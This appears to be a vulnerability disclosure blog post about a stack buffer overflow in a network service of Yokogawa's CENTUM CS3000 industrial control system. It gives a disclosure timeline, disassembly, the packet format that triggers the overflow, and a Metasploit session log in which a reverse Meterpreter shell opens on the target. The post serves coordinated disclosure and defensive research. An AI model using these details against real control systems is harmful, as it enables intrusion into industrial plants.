Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product, and disclosed three of the vulnerabilities we found on March 10 on this blog. As noted in the talk, we intended to release information about all of the vulnerabilities we found in the product at the time. Today, after some negotiation with Yokogawa and ICS-CERT, we're disclosing another of the discovered vulnerabilities, in a network service running by default in CENTUM CS3000 installation. The vendor asked for some extra time to assess and address this vulnerability, which is why we ended up with a slightly laggy disclosure schedule this time.

For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerability Summary

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKESimmgr.exe” service, started automatically on the System startup by default, listens on TCP/34205. By sending a specially crafted packet to the port TCP/34205 it's possible to trigger an stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

Disclosure Timeline

Date Description
Dec 27, 2013 Initial disclosure to the vendor, Yokogawa
Jan 13, 2014 Disclosure to CERT/CC
Jan 14, 2014 CERT/CC assigns VU#479196 and forwards details to JPCERT
Feb 03, 2014 CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities.
ICS-CERT tracking #: ICS-VU-205881
JPCERT tracking #: JVNVU#98181377, JPECERT#98191377
March 6, 2014 Yokogawa and ICS-CERT asks for an extension for R7-2013-19.2 (this vulnerability)
May 9, 2014 Metasploit module published in Pull Request #3344

Technical Analysis

The vulnerability exists in the function sub_409310 (IDA notation). This function tries to extract data (probably strings) from a user sent packet. But the function does an insecure usage of memcpy like function, to copy user controlled data to a static size (64 bytes) stack buffer:

.text:00409360 loc_409360:                            ; CODE XREF: get_string_sub_409310+42j  
.text:00409360                mov    ecx, 10h  
.text:00409365                xor    eax, eax  
.text:00409367                lea    edi, [esp+50h+var_40]  
.text:0040936B                add    esi, edx  
.text:0040936D                rep stosd              ; init var_40 with 0x0.  
.text:0040936F                mov    ecx, ebx        ; The memcpy length comes from user controlled data  
.text:00409371                lea    edi, [esp+50h+var_40] ; destination, var_40 (0x40 bytes buffer)  
.text:00409375                mov    edx, ecx  
.text:00409377                lea    eax, [esp+50h+var_40]  
.text:0040937B                shr    ecx, 2  ; divides the size by 4 because it's using rep movsd, where every movsd is for a double word (4 bytes)  
.text:0040937E                rep movsd              ; esi pointing to user controlled data from the packet, leading to overflow  

The above assembly chunk translates to:

char dst[64];  
memset(dst, 0, 64);  
memcpy(dst, user_data, user_length);  

Where user_data and user_length are user controlled values.

Exploitation

It's possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/34205. According to our understanding the packet has the next format:

Field Length
Header 6 bytes
Data Length specified in the header

Where the header structure is:

Field Length
Identifier 4 bytes
Data Length 2 bytes

A packet with an identifier 0x1 in the header can be used to trigger the vulnerability. For this packet the data structure is:

Field Length
Identifier 4 bytes
Data Length 2 bytes
Data Data Length bytes

A packet with “0x1” as Identifier in both the Header and the Data can be used to reach the vulnerable function. The Data Length and Data fields can be used to trigger the buffer overflow.

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 running on Windows XP SP3 and Windows 2003 SP2 (DEP bypas), where is possible to gain arbitrary code execution by corrupting the SEH handler stored in the stack:

msf exploit(yokogawa_bkesimmgr_bof) > exploit
[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 427 bytes...
[*] Sending stage (770048 bytes) to 192.168.172.192
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.192:1048) at 2013-11-17 21:17:14
-0600
meterpreter > getuid
Server username: HIS0101\CENTUM
meterpreter > sysinfo
Computer : HIS0101
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.